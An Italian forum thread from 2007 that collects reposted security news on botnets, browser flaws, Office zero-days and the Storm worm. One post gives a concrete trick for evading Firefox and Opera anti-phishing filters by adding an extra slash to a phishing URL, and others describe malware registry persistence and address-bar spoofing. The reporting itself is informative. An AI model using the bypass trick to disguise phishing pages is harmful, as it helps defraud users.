Pare che l´attività messa su dall´uomo vertesse sulla vendita disoftware commerciali sui maggiori siti di aste online: Zamir spacciavacopie di Microsoft Server SQL 2000 Enterprise per 7.750dollari, un bel risparmio considerando il prezzo reale di 25.000dollari del software appena uscito. Altro pezzo forte era Adobe Photoshop Creative Suite 2, venduto per 280 dollari a fronte dei 500 necessari per una copia originale.

Dal2000, l´uomo sarebbe riuscito a procurarsi in questo modo 750.000dollari di guadagno, senza la minima fatica se non quella dimasterizzare i dischi. Le denunce di alcuni utenti ad Adobe eMicrosoft, dopo essersi accorti di aver ricevuto numeri serialicontraffatti insieme all´acquisto, ha fatto scattare le indagini, e ha infine segnato la conclusione della losca carriera del pirata di software.

juninho85
10-02-2007, 12:34
Le società di sicurezza lanciano l’allarme: ben presto la rete potrebbe trovarsi nell’impossibilità di funzionare normalmente, a causa dell’azione nefasta dei PC zombi controllati da remoto. Che sono troppi, parola dell’inventore di Internet.

Un quarto dei PC connessi in rete è composto da sistemi zombi, asserviti al volere dei criminali informatici per mezzo di malware che agisce all´insaputa dell´utente. A lanciare l´allarme è Vinton Cerf, l´uomo al cui ingegno si deve l´invenzione del fondamentale protocollo TCP/IP, alla base del funzionamento del network globale: al recente Forum Internazionale di Davos lo scienziato non ha usato mezze misure, arrivando a parlare del possibile collasso totale della rete per opera dei burattinai senza volto capaci di controllare da remoto i PC zombificati.

Cerf stima in 600 milioni il numero di sistemi attualmente collegati ad Internet, il che porta a 150 milioni il numero totale di zombi sempre più controllati nell´ambito delle botnet: tradizionalmente impiegati per inviare spam e bloccare singoli siti web, il danno potenziale che sono in grado di generare potrebbe mettere fuori gioco l´intera rete.

Non è infatti un mistero che oggigiorno i malware siano progettati per scopi ben specifici e con investimenti interessati da parte dei soliti noti, ed esiste la capacità teorica di far partire attacchi DDoS contemporanei in grado di bloccare aziende, società di telecomunicazioni e istituzioni governative. O di aumentare ulteriormente la distribuzione di spam che, dopo aver distrutto l´e-mail, potrebbe segnare la fine anche del World Wide Web.

Contro le botnet già da tempo gli esperti sembra abbiano gettato la spugna, arrivando a dire che il livello di sofisticazione di questi strumenti criminali è tale che le aziende di sicurezza sono arretrate di qualche anno rispetto all´underground telematico assoldato dai criminali. Una possibile soluzione-tampone, secondo qualche opinione circolata in rete in questi giorni, potrebbe venire rappresentata dalle nuove tecnologie di sicurezza integrate in Windows Vista.

giannola
12-02-2007, 15:28
Oslo - Il ricercatore di sicurezza norvegese Michal Zalewski ha reso pubblico un "trucco" per bypassare con estrema facilità i filtri antiphishing integrati in Opera 9 e Firefox 2.


Zalewski spiega nei suoi advisory che è sufficiente aggiungere un carattere "/" alla fine di un nome di dominio perché il sistema antiphishing non riconosca più un sito truffaldino come tale.

Ad esempio, se la pagina web sito-di-phisher.com/phishing.html venisse normalmente bloccata, un aggressore potrebbe aggirare il filtro semplicemente modificando la URL: sito-di-phisher.com//phishing.html. Per inciso, anche aggiungendo "/" all fine del dominio, il link continuerebbe a puntare correttamente alla pagina phishing.html.

L'esperto afferma di aver segnalato la debolezza a Opera e Mozilla Foundation lo scorso dicembre.

Negli scorsi giorni Zalewski ha reso pubblico anche un altro bug di Firefox, questa volta nel filtro anti pop-up delle versioni 1.5.x. La debolezza potrebbe consentire ad un malintenzionato di accedere ai contenuti del disco locale. Maggiori info qui (http://www.securiteam.com/securitynews/5JP051FKKE.html) .

punto informatico

wizard1993
12-02-2007, 15:48
Le società di sicurezza lanciano l’allarme: ben presto la rete potrebbe trovarsi nell’impossibilità di funzionare normalmente, a causa dell’azione nefasta dei PC zombi controllati da remoto. Che sono troppi, parola dell’inventore di Internet.

Un quarto dei PC connessi in rete è composto da sistemi zombi, asserviti al volere dei criminali informatici per mezzo di malware che agisce all´insaputa dell´utente. A lanciare l´allarme è Vinton Cerf, l´uomo al cui ingegno si deve l´invenzione del fondamentale protocollo TCP/IP, alla base del funzionamento del network globale: al recente Forum Internazionale di Davos lo scienziato non ha usato mezze misure, arrivando a parlare del possibile collasso totale della rete per opera dei burattinai senza volto capaci di controllare da remoto i PC zombificati.

Cerf stima in 600 milioni il numero di sistemi attualmente collegati ad Internet, il che porta a 150 milioni il numero totale di zombi sempre più controllati nell´ambito delle botnet: tradizionalmente impiegati per inviare spam e bloccare singoli siti web, il danno potenziale che sono in grado di generare potrebbe mettere fuori gioco l´intera rete.

Non è infatti un mistero che oggigiorno i malware siano progettati per scopi ben specifici e con investimenti interessati da parte dei soliti noti, ed esiste la capacità teorica di far partire attacchi DDoS contemporanei in grado di bloccare aziende, società di telecomunicazioni e istituzioni governative. O di aumentare ulteriormente la distribuzione di spam che, dopo aver distrutto l´e-mail, potrebbe segnare la fine anche del World Wide Web.

Contro le botnet già da tempo gli esperti sembra abbiano gettato la spugna, arrivando a dire che il livello di sofisticazione di questi strumenti criminali è tale che le aziende di sicurezza sono arretrate di qualche anno rispetto all´underground telematico assoldato dai criminali. Una possibile soluzione-tampone, secondo qualche opinione circolata in rete in questi giorni, potrebbe venire rappresentata dalle nuove tecnologie di sicurezza integrate in Windows Vista.


infatti una volta avevo letto su un giornale (forse sole 24 ore) che al new york hanno issato la bandiera bianca e sul fronte russo le truppe alleate sono in ritirata; fate voi

giannola
13-02-2007, 10:50
Trend Micro riporta la scoperta di una nuova variante di Looked, virus tradizionale con contorno di Spyware passato alle cronache del 2006 come una delle peggiori infezioni del genere. Intanto Symantec pubblica informazioni su un killer di file multimediali e una possibile, letale evoluzione delle attuali tecniche stealth dei Windows rootkit.

Ritorna ad infestare la rete Looked, file virus tristemente famoso per essere stato, nell'anno appena concluso, protagonista di una proliferazione notevole e della distribuzione di Spyware ruba-informazioni. Lo denuncia Trend Micro, con la pubblicazione della scheda di PE_LOOKED.RI-O, nuova variante del virus appena scoperta e classificata sulla Virus Encyclopedia.

E mai come in questo caso la definizione di "virus" è più appropriata: Looked (e con esso la nuova variante appena scoperta) funziona esattamente come la genìa di malware che per anni, prima dell'avvento della Internet moderna e la conseguente recrudescenza di worm e spyware, ha imperversato sui PC di tutto il mondo (si veda a riguardo l'introduzione di Programmi antivirus a confronto), cioè iniettando copie di se stesso nei file eseguibili presenti sui dischi collegati al sistema.

Il codice maligno, una volta arrivato sul sistema via download o e-mail e mandato in esecuzione, si assicura prima di tutto l'esecuzione ad ogni avvio, copiando una replica del proprio codice nella posizione %Windows%\uninstall\RUNDL132.EXE e creando la seguente chiave di registro:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
load = "%Windows%\uninstall\RUNDL132.EXE"

In aggiunta, il virus rilascia il componente %Windows%\RichDll.DLL, responsabile per le routine di propagazione via risorse condivise nel network di appartenenza. Una volta preso il possesso della macchina, LOOKED.RI-O cerca file eseguibili con estensione .exe su tutti i drive esistenti nell'intervallo di volumi C: - Z:, e prova appunto a propagarsi in rete usando i nomi utente administrator e guest con password vuota. In aggiunta, il virus prova a terminare i processi appartenenti al software Kingsoft Antivirus Service, e a connettersi a diversi indirizzi per scaricare nuovo malware.

Proprio questa sua capacità, sostiene Trend Micro in un articolo esaustivo dedicato all'infezione, lo ha reso particolarmente temibile nel 2006, soprattutto nelle zone dell'Asia del Pacifico. Looked è infatti imputato di essere stato il trampolino di lancio dell'invasione di diversi Spyware ruba-informazioni specificatamente pensati per operare nell'area, come ben esemplifica la routine di contrasto del suddetto antivirus prodotto in Cina.


Ma il "bestiario" di questa settimana comprende altre interessanti novità dal fronte malware: le due "new entry", segnalate entrambe da Symantec, sono rispettivamente un trojan distruttivo che prende di mira i file multimediali dell'utente e un rootkit capace di camuffarsi come mai fino ad ora era stato osservato tra i codici maligni in the wild.

Trojan.Killwma è un cavallo di troia piuttosto rozzo: non residente in memoria, una volta eseguito sulla macchina infetta crea un'operazione pianificata per venire lanciato ogni 5 minuti. Nello stesso istante dell'esecuzione scatta il payload, e il malware cerca all'interno di tutte le cartelle dei dischi locali i file in formato WMA, cancellandone l'header e rendendoli di fatto inutilizzabili.

Meno pericoloso per i dati è invece Hacktool.Unreal.A, identificato dai laboratori Symantec il primo febbraio. Stando alle informazioni pubblicate dalla società al momento di scrivere, l'agente infettivo non è altro che un proof of concept creato per nascondere la propria presenza alle attuali tecniche anti-rootkit impiegate dai software di sicurezza. Una volta in esecuzione, Unreal.A si installa come servizio all'interno dell'ADS (Alternate Data Stream) C:\:unreal.sys, impossibile da individuare da Esplora Risorse e, pare, anche con programmi specifici per rootkit.

Il rootkit crea inoltre le seguenti sottochiavi di registro associate al servizio:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Unreal]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UNREAL]

Per quanto pare che l'agente virale si limiti alle sole azioni suddette, è certamente fonte di preoccupazione la sua capacità di farsi beffe degli strumenti più sofisticati attualmente in circolazione per combattere le minacce informatiche in proliferazione costante.

megalab.it

juninho85
17-02-2007, 16:59
Non è di certo un buon periodo per gli utenti di Firefox, dopo la notizia di qualche giorno fa di una grave falla nella gestione dei cookies da parte del browseropen source, arriva sempre dallo stesso ricercatore di sicurezza, Michal Zalewski,la notizia che Firefox soffre di una nuova falla che potrebbe essereusata da un sito web maligno, per confondere gli utenti circa lavalidità della pagina appena aperta. La falla inoltre può essere usataper by-passare un vecchio bug risolto di UI spoofing.

La nuova vulnerabilità permette ad uno script di aprire una pagina "about blank", priva dell´indirizzo URL in un nuovo tab.

Lo script a questo punto può interagire con la nuova pagina appena aperta, iniettando codice HTML con il metodo document write, aggiornando la "document location" e la barra di indirizzo a quella dello script appena eseguito.
Poiché "about blank" è un documento HTML valido è inoltre possibile iniettare il codice con l´uso di document body appendChild.In questo caso la barra dell´URL rimane priva dell´indirizzo, ilpulsante aggiorna è disabilitato e le info sulla pagina non sonosufficienti per stabilire la bontà della pagina stessa. Una pagina cosìcreata potrebbe essere scambiata per un messaggio interno del browser enon una pagina maligna creata su misura.

Sfruttando un vecchio bug nel quale quando una pagina viene apertasenza barra degli indirizzi e menù, un attacker potrebbe usarecontrolli HTML o codice XUL per visualizzare sulla barra degliindirizzi "google.com" mentre in realtà un IFRAME carica la pagina"zombo.com", similmente le finestre "about blank" senza document location definito possono essere usate per visualizzare altre pagine, senza che queste possano destare sospetto.

Zalewski ha anche reso disponibile una pagina di test che permette di verificare la vulnerabilità nel browser. Vai a lcamtuf.coredump.cx/ffblank/

juninho85
17-02-2007, 17:00
Se si viene contattati tramite Google Talk da uno sconosciuto che propone un link, è meglio ignorare il messaggio e passare oltre: trattasi, probabilmente, di un amo lanciato per far abboccare gli utenti nel tentativo di installare un trojan ormai tristemente famoso come «storm trojan», ovvero il trojan giunto sulla scia del ciclone Kyrill. Il tutto è stato descritto per eWeek da Jose Nazario, software and security engineer della Arbor Networks.

Il worm ha colpito tutta l´area nord-europea facendo leva sulle notizie relative ai danni del ciclone e, una volta identificato e catalogato, ha preso nuovo nome di battesimo in "Dorf". Ora Dorf (già etichettato come il peggior malware di questo inizio 2007) si fa vivo in un nuovo modo, cercando di approfittare degli instant messenger di AOL, Google e Yahoo nel tentativo di far cliccare su appositi link l´utenza. Al click si pone la vittima direttamente a contatto con la potenziale infezione ed il tutto rischia di causare ingenti danni grazie alle minori soglie di attenzione solitamente riservate dagli utenti agli instant messenger.

«Is it about you?»: è questo il messaggio con cui solitamente si presenta Dorf. La prima versione è comunque destinata a figliare così come Dorf ha già partorito più varianti nel momento in cui si è moltiplicato tramite il tradizionale canale della posta elettronica. Dietro al semplice tentativo di attacco sui singoli utenti c´è molto di più comunque: Dorf sta combattendo una battaglia con Warezof ed entrambi combattono a loro volta contro le principali aziende di anti-spam. Dietro ai trojan, a conferma della leva economica che spinge la progettazione dei peggiori malware in circolazione, c´è insomma una vera e propria faida che si manifesta a colpi di server abbattuti.

Per gli utenti stare lontani dalla faida potrebbe essere tutto sommato cosa semplice: basta porre la giusta attenzione ed evitare click incauti in caso di situazione dubbia.

juninho85
17-02-2007, 17:01
Nei giorni scorsi è stata segnalata una pericolosa vulnerabilità in Mozilla Firefox 2.0. Il problema risiede nella gestione dei cookies e nell´erronea autenticazione effettuata dal browser opensource.

Il problema, stando a quanto riportato da varie fonti tra cui citiamo F-Secure (http://www.f-secure.com/weblog/#00001114), potrebbe consentire ad un sito malevolo di fingersi per un´altro. L´utente quindi cadrebbe nel tranello e il rischio di eventuali azioni di Phishing è tutt´altro che remoto. A questo (https://bugzilla.mozilla.org/show_bug.cgi?id=370445) indirizzo sono disponibili ulteriori dettagli direttamente dal team di Mozilla.

Questo problema per Firefox (http://www.hwupgrade.it/news/sicurezza/problema-con-firefox-2_20167.html#) giunge in un momento abbastanza delicato infatti negli ultimi tempi il browser di Mozilla Foundation ha fatto registrare una piccola battuta di arresto in merito alla propria diffusione. In realtà il decremento è minimo e arriva dopo mesi di costante crescita quindi, forse, non è il caso di allarmarsi.

giannola
18-02-2007, 07:00
Non è di certo un buon periodo per gli utenti di Firefox, dopo la notizia di qualche giorno fa di una grave falla nella gestione dei cookies da parte del browseropen source, arriva sempre dallo stesso ricercatore di sicurezza, Michal Zalewski,la notizia che Firefox soffre di una nuova falla che potrebbe essereusata da un sito web maligno, per confondere gli utenti circa lavalidità della pagina appena aperta. La falla inoltre può essere usataper by-passare un vecchio bug risolto di UI spoofing.

La nuova vulnerabilità permette ad uno script di aprire una pagina "about blank", priva dell´indirizzo URL in un nuovo tab.

Lo script a questo punto può interagire con la nuova pagina appena aperta, iniettando codice HTML con il metodo document write, aggiornando la "document location" e la barra di indirizzo a quella dello script appena eseguito.
Poiché "about blank" è un documento HTML valido è inoltre possibile iniettare il codice con l´uso di document body appendChild.In questo caso la barra dell´URL rimane priva dell´indirizzo, ilpulsante aggiorna è disabilitato e le info sulla pagina non sonosufficienti per stabilire la bontà della pagina stessa. Una pagina cosìcreata potrebbe essere scambiata per un messaggio interno del browser enon una pagina maligna creata su misura.

Sfruttando un vecchio bug nel quale quando una pagina viene apertasenza barra degli indirizzi e menù, un attacker potrebbe usarecontrolli HTML o codice XUL per visualizzare sulla barra degliindirizzi "google.com" mentre in realtà un IFRAME carica la pagina"zombo.com", similmente le finestre "about blank" senza document location definito possono essere usate per visualizzare altre pagine, senza che queste possano destare sospetto.

Zalewski ha anche reso disponibile una pagina di test che permette di verificare la vulnerabilità nel browser. Vai a lcamtuf.coredump.cx/ffblank/

lo posso dire "minchia, impressionante" ?

In momenti come questo preferisco il mio IE superblindato.

giannola
19-02-2007, 15:45
Redmond (USA) - La scorsa settimana, ad un solo giorno di distanza dalla pubblicazione dei bollettini di sicurezza di febbraio, Microsoft ha rilasciato un advisory relativo ad una nuova vulnerabilità zero-day di Word.

La falla, causata da un bug di tipo buffer overflow, interessa Office 2000 e Office XP e potrebbe essere sfruttata da un malintenzionato per eseguire del codice a propria scelta. Il codice maligno può essere inglobato all'interno di un documento Word appositamente creato per innescare il bug.

La vulnerabilità è stata segnalata il 9 febbraio a Microsoft da Dave Marcus, un ricercatore di sicurezza di McAfee Avert Labs che ha ricevuto l'exploit da un cliente della propria società. Marcus ha avvisato che su Internet circola già un documento maligno che, se aperto, tenta di scaricare e installare nel computer un trojan o un bot. Chi cade nella trappola rischia di vedersi rubare dati personali o di ingrossare le fila di quei sistemi zombie che, come parte delle cosiddette botnet, vengono utilizzati dai cracker come teste di ponte per attacchi di vario genere.

Microsoft ha detto che il proprio servizio gratuito Windows Live OneCare Safety Scanner è già in grado di rilevare l'exploit, inoltre si è impegnata a corregge il problema in uno dei suoi prossimi bollettini di sicurezza.

Quella appena scoperta è l'ennesima vulnerabilità zero-day ad aver colpito la celebre suite per l'ufficio di Microsoft nel giro di pochi mesi. Va detto che nessuna di queste debolezze interessa il nuovo Office 2007.

punto informatico


verrebbe da dire estiqatz!:D non se ne può più di queste vulnerabilità di office.

giannola
19-02-2007, 15:47
Secondo Vinton Cerf, padre del protocollo tcp/ip attualmente utilizzato dalla rete per lo scambio di informazioni, Internet potrebbe collassare da un momento all'altro.

Secondo Cerf un quarto dei computer connessi a Internet è colpito dal malware; questi pc possono essere quindi utilizzati da creatori di virus all'insaputa degli utenti.

Questa situazione potrebbe peggiorare e portare al collasso totale della rete, messa in difficoltà già oggi dalle email di spam che circolano e dal traffico generato da malware e virus.

Cerf è meravigliato che la rete sopporti ancora il traffico al quale è sottoposta ed è convinto che potrebbe cedere a breve se non si porrà un freno alla diffusione di malware e virus.

A detta di esperti del settore, inoltre, incombe su internet una nuova minaccia rappresentata da una nuova generazione di trojan che sarebbero in grado di creare un'unica grande botnet dalla quale inviare attacchi di massa al web.

dgmag

giannola
19-02-2007, 15:50
Le società di sicurezza lanciano l’allarme: ben presto la rete potrebbe trovarsi nell’impossibilità di funzionare normalmente, a causa dell’azione nefasta dei PC zombi controllati da remoto. Che sono troppi, parola dell’inventore di Internet.

Un quarto dei PC connessi in rete è composto da sistemi zombi, asserviti al volere dei criminali informatici per mezzo di malware che agisce all'insaputa dell'utente. A lanciare l'allarme è Vinton Cerf, l'uomo al cui ingegno si deve l'invenzione del fondamentale protocollo TCP/IP, alla base del funzionamento del network globale: al recente Forum Internazionale di Davos lo scienziato non ha usato mezze misure, arrivando a parlare del possibile collasso totale della rete per opera dei burattinai senza volto capaci di controllare da remoto i PC zombificati.

Cerf stima in 600 milioni il numero di sistemi attualmente collegati ad Internet, il che porta a 150 milioni il numero totale di zombi sempre più controllati nell'ambito delle botnet: tradizionalmente impiegati per inviare spam e bloccare singoli siti web, il danno potenziale che sono in grado di generare potrebbe mettere fuori gioco l'intera rete.

Non è infatti un mistero che oggigiorno i malware siano progettati per scopi ben specifici e con investimenti interessati da parte dei soliti noti (come ben dimostra il caso Gromozon), ed esiste la capacità teorica di far partire attacchi DDoS contemporanei in grado di bloccare aziende, società di telecomunicazioni e istituzioni governative. O di aumentare ulteriormente la distribuzione di spam che, dopo aver distrutto l'e-mail, potrebbe segnare la fine anche del World Wide Web.

Contro le botnet già da tempo gli esperti sembra abbiano gettato la spugna, arrivando a dire che il livello di sofisticazione di questi strumenti criminali è tale che le aziende di sicurezza sono arretrate di qualche anno rispetto all'underground telematico assoldato dai criminali. Una possibile soluzione-tampone, secondo qualche opinione circolata in rete in questi giorni, potrebbe venire rappresentata dalle nuove tecnologie di sicurezza integrate in Windows Vista.

Ma come già riportato da MegaLab.it, pare proprio che anche con il rinnovato sistema operativo di Microsoft la prospettiva non sia affatto delle migliori

megalab

mi pare ora di cominciare a riflettere su questa situazione visto che da un po di tempo, la rete nn sembra più funzionare a dovere.

giannola
28-02-2007, 10:20
Aliso Viejo (USA) - Dopo essere riuscito dribblare le vulnerabilità recentemente scoperte nei suoi predecessori, Office 2007 si trova ora a fronteggiare quello che eEye Digital Security considera il primo grave problema di sicurezza della nuova suite. Si tratta di una falla legata al modo in cui Publisher 2007 gestisce il proprio formato dei documenti (.pub).


Come spesso accade quando il problema interessa il parsing dei documenti, un aggressore potrebbe creare un file ad hoc che, una volta aperto dall'utente, sfrutta il bug per eseguire del codice dannoso. Tale file potrebbe essere inglobato in una pagina web oppure allegato ad una email.

"Siamo rimasti sorpresi dall'aver scoperto una falla così in fretta (a circa quattro settimane dal debutto consumer di Office 2007, NdR) e in uno dei prodotti chiave della suite", ha affermato Ross Brown, CEO di eEye. Il ricercatore ha anche aggiunto di aver utilizzato un processo di code auditing standard per trovare il bug, segno che "Microsoft non sembra aver fatto un buon lavoro nella verifica del proprio codice, oppure era a corto di personale da dedicare a questa operazione".

Microsoft ha fatto sapere di aver ricevuto la segnalazione di eEye e di stare investigando sulla natura e la portata del problema.

Negli scorsi giorni un ricercatore di sicurezza italiano noto come "shinnai" ha pubblicato un advisory in cui porta alla luce una vulnerabilità nel controllo ActiveX Microsoft Windows Shell User Logon di Windows XP SP2.

L'advisory spiega che un malintenzionato potrebbe confezionare un file HTML contenente un richiamo a shgina.dll che, quando aperto dall'utente, aggiunge automaticamente al sistema un account con privilegi limitati. Va sottolineato che, in Internet Explorer 6 e 7, l'utente deve espressamente autorizzare l'esecuzione del controllo ActiveX. Sebbene il bug possa essere sfruttato solo in locale, shina ha invitato la comunità degli esperti di sicurezza a "non sottovalutare il problema".


punto-informatico

giannola
28-02-2007, 10:23
5 Febbraio 2007

Identificato in oltre 2.500 varianti grazie anche alla tecnologia proattiva Behavioral Genotype Protection di Sophos, il malware Dorf ha rappresentato un terzo delle nuove minacce rilevate nel mese di gennaio. Identificato di recente, ha avuto un impatto massiccio sugli utenti di tutto il mondo, piazzandosi di prepotenza in cima alla classifica mensile.

Sophos, società leader a livello mondiale nel settore della sicurezza informatica, ha reso nota la classifica del malware e dei falsi allarmi che hanno dominato la scena nel mese di gennaio 2007, causando problemi agli utenti di tutto il mondo.

Il rapporto, compilato sui dati raccolti dai SophosLabs, rivela che il malware Dorf, identificato di recente, ha avuto un impatto massiccio sugli utenti di tutto il mondo, piazzandosi di prepotenza in cima alla top ten mensile, per aver rappresentato quasi la metà di tutto il malware segnalato a gennaio.

Dorf è stato disseminato su vasta scala sotto forma di allegato a una mail ingannevole sulle vittime provocate da Kyrill, l’uragano che ha imperversato nei Paesi del Nord Europa. Alla fine del mese, gli autori hanno cambiato tattica, lanciando un’ulteriore campagna in cui il malware era camuffato da cartolina elettronica d’amore. Le altre posizioni della classifica non mostrano variazioni: i worm Netsky, Mytob e Stratio sono rimasti stabili, rispettivamente al secondo, terzo e quarto posto, rappresentando nel loro insieme un terzo di tutto il malware segnalato.

"Presentandosi come notizia dell’ultima ora dal titolo incisivo, Dorf, altrimenti detto 'Storm Trojan', si è abbattuto sulle caselle di posta in tutto il mondo, con una furia paragonabile a quella dell’uragano, nel tentativo di compromettere i PC degli utenti", ha dichiarato Walter Narisoni, Security Consultant di Sophos Italia. "Far leva sull’interesse suscitato da eventi di attualità è un trucco sicuro e collaudato. Pur non trattandosi di una forma particolarmente sofisticata di attacco, si è dimostrato molto efficace per spingere i destinatari ad abbassare la guardia".

Sophos ha rilevato finora oltre 2.500 varianti del malware Dorf, pressoché un terzo delle nuove minacce identificate a gennaio 2007. La maggior parte di queste varianti è stata intercettata dalla tecnologia proattiva Behavioral Genotype® Protection di Sophos, prima ancora di essere ufficialmente identificata come appartenente alla famiglia di malware Dorf.

L’incidenza delle mail infette, seppur notevolmente superiore rispetto a dicembre 2006, continua a mantenersi bassa: una sola mail infetta su 238, pari allo 0,42% delle mail in circolazione. Durante il mese di gennaio, Sophos ha identificato 7.272 nuove minacce, pertanto il numero complessivo di malware da cui è in grado di proteggere è salito a 214.956.

articolo e statistiche
http://www.sophos.it/pressoffice/news/articles/2007/02/pr_it_toptenjan07.html

giannola
28-02-2007, 10:31
Febbraio 22nd, 2007

Una ulteriore variante del phishing attack alla Poste Italiane sta affermandosi nel sistema di email italiano. Non solo per eventuali utenti titolari di bancoposta ma anche per tutti coloro che possiedono (come me) una semplice postepay per fare acquisti su Internet.


articolo completo:

http://www.pcalsicuro.com/main/2007/02/posteit-attacco-variante-phishing/

giannola
03-03-2007, 07:32
I trojan mutaforma (pagina 1 di 2)

Roma - La maggiore consapevolezza maturata dagli utenti Internet in merito a privacy e sicurezza, nonché le contromisure messe in atto da Microsoft e altri produttori di software, hanno contribuito in questi anni a ridimensionare il fenomeno worm e trojan. Abbassare la guardia sarebbe tuttavia imprudente, e la dimostrazione arriva dalla diffusione fatta registrare nell'ultimo periodo da minacce come Storm Worm e SpamtaLoad.


Anche noto come Small.DAM e Peacomm, Storm Worm domina ormai da molte settimane la classifica dei malware più diffusi al mondo. Il solo laboratorio di SonicWall afferma di aver registrato più di un milione di casi di infezione, con nuove varianti che compaiono in rapida successione: il codice delle varianti più recenti cambia di continuo, inclusi gli URL ai file infetti, così che la loro rilevazione diventa sempre più difficile. Secondo Guillaume Lovet, responsabile Threat Response Team EMEA di Fortinet, questo mese sono state riscontrate non meno di 36 diverse varianti attive di Storm Worm, anche se quasi il 60% dei rilevamenti è imputabile a sola una variante.

SonicWall spiega che questo worm, catalogabile anche fra i trojan, viene diffuso mediante messaggi di spam che contengono in allegato un file eseguibile camuffato da documento informativo "con notizie d'attualità di grande impatto".

"Una volta attivato - si legge in un comunicato della società di sicurezza - l'allegato inizia a scaricare automaticamente altro codice nocivo e apre una backdoor nella macchina infetta che ne consente il controllo da remoto e contemporaneamente installa un rootkit che nasconde il programma nocivo. Il computer compromesso si trasforma in uno zombie diventando parte integrante di una rete botnet". Le stesse botnet che negli scorsi mesi sono state utilizzate per lanciare attacchi verso diversi siti, tra cui quelli che ospitano database antispam.

Sebbene le prime versioni di Storm Worm utilizzassero modalità di diffusione e infezione non dissimili da quelle dei worm tradizionali, una delle più recenti incarnazioni del malware si è guadagnata l'attenzione degli esperti per il fatto di introdurre un nuovo ed efficace meccanismo di social engineering. Secure Computing, che per prima ha analizzato il comportamento della nuova variante di Storm, spiega che quest'ultima attende che l'utente invii un messaggio ad una webmail, ad un blog o a certi forum e gruppi di discussione web-based, e vi aggiunge di nascosto un link al codice virale.

"Questo annuncia un nuovo trend fra i malware che si diffondono attraverso i blog, i gruppi di discussione e le email web-based", ha affermato Dmitri Alperovitch, ricercatore presso Secure Computing. "Questa nuova minaccia è inoltre particolarmente insidiosa perché gli scanner antivirus non sempre la rilevano. Le ultime variani di Storm utilizzano tecniche polimorfiche per far apparire i loro file binari continuamente diversi rispetto alle impronte virali delle soluzioni antivirus".

Anche nel "Rapporto sulla sicurezza per il 2007" appena pubblicato da Sophos si afferma che stanno diminuendo le minacce contenute nei messaggi email a favore delle minacce ospitate sul web.

"Nel 2006 le minacce più prolifiche sono stati i worm appartenenti alle famiglie Mytob, Netsky, Sober e Zafi, che nel complesso hanno rappresentato più del 75% di tutte le mail infette", si legge nel rapporto. "Tuttavia, secondo le previsioni di Sophos, nel 2007 si assisterà a un significativo cambio di rotta: anziché utilizzare la posta elettronica per diffondere il malware, i cybercriminali sfrutteranno la popolarità di Internet a livello globale e l'accresciuta interattività degli utenti web".

"La straripante presenza dello Storm Worm non è priva di conseguenze, visto che viene sfruttata per generare e inviare ingenti quantità di spam", ha afferma Lovet di Fortinet. "Comunque la battaglia contro lo spam non è persa. Una semplice analisi dei fatti dimostra che nella corsa finale agli armamenti per contrastare i filtri di analisi dei contenuti gli spammer stanno perdendo terreno".

In queste settimane si è guadagnato l'attenzione degli esperti di sicurezza anche SpamtaLoad, un ceppo di worm e cavalli di Troia che si è dimostrato particolarmente prolifico. Tra le varianti più diffuse c'è il trojan SpamtaLoad.DO, che lo scorso martedì Panda Software ha rilevato in circa il 40% dei messaggi ricevuti dai propri laboratori internazionali.

Il celebre produttore di antivirus ha spiegato che il trojan si diffonde attraverso messaggi di posta elettronica con oggetto e testo variabili, quali "Error", "Good day", "hello" o "Mail Delivery System". SpamtaLoad.DO è contenuto in un file eseguibile allegato alla e-mail, ed anche in questo caso il nome è variabile. Se l'utente lo esegue, il trojan mostra un falso messaggio di errore o apre il blocco note contenente un testo. Questo file scarica sul sistema il worm Spamta.TQ, progettato per il rinvio di SpamtaLoad.DO a tutti gli indirizzi email recuperati dal PC infetto.

"Questo tipo di codici non è fine a se stesso", ha affermato Luis Corrons, direttore tecnico dei laboratori di Panda. "In molti casi, vengono usati per distrarre le aziende che si occupano di sicurezza. Infatti, mentre queste ultime concentrano i loro sforzi per eliminare le minacce, i cyber criminali ne approfittano per lanciare altre creazioni, spesso molto più pericolose, in maniera silenziosa".

Durante le ondate di worm come SpamtaLoad, Corrons ha spiegato che vengono messe in circolazione, in poco tempo, numerose varianti della stessa famiglia. "Gli utenti devono agire con cautela, perché questo Trojan potrebbe essere il primo di una nuova serie di aggressioni", ha ammonito il ricercatore.

Talvolta i worm minacciano anche gli utenti delle piattaforme Unix. L'ultimo esempio è dato da un vermicello che, come spiegato in questo post (http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/) da Jose Nazario, senior software engineer di Arbor Networks, sfrutta una vulnerabilità zero-day nel servizio Telnet di Solaris 10 per infettare un server e diffondersi automaticamente verso altri sistemi. In attesa di correggere la falla, Sun ha pubblicato alcune istruzioni (http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen) per rilevare e rimuovere il worm.


I dati che preoccupano (pagina 2 di 2)


Nel già citato Rapporto, Sophos afferma che "la posta elettronica continuerà ad essere un importante vettore di diffusione del malware, ma il crescente utilizzo di soluzioni per la sicurezza del gateway di posta sta spingendo i virus writer ad optare per altri metodi di attacco, tant'è che il numero dei siti web infetti è in costante aumento". La società parla di una media di 5.000 URL al giorno che ospitano codici malevoli.


"Per i criminali informatici, Internet rappresenta oggi la più facile via di accesso alle reti aziendali: un numero sempre maggiore di utenti non solo naviga senza controllo, ma scarica programmi e streaming audio/video, mettendo a rischio la sicurezza delle reti aziendali", ha spiegato Walter Narisoni, security consultant di Sophos Italia. "La maggior parte delle aziende non è preparata per monitorare il comportamento dei propri utenti durante la navigazione web, né tanto meno per controllarlo. È essenziale quindi che le aziende ventilino l'introduzione nella propria strategia globale di sicurezza di misure volte a garantire una navigazione web sicura".

Nel corso del 2006 Sophos ha registrato un calo degli spyware tradizionali a favore dei trojan scaricati dai siti Internet. È noto come cracker e autori di virus inducano gli utenti a cliccare su un URL maligno per mezzo di tecniche di social engineering: ad esempio, inviando una mail con oggetto "Offerta speciale" in cui invitano l'utente a visitare un sito web che dovrebbe fornire ulteriori informazioni sull'offerta. Cliccando sul link all'interno del messaggio, l'utente scarica automaticamente sul proprio PC un file eseguibile che, a sua volta, tenta di scaricare altri trojan per mettere fuori gioco il sistema di protezione del PC.

"Solo a questo punto - spiega Sophos - viene scaricato un componente spyware che, sul computer ormai privo di difese, avrà migliori probabilità di successo".

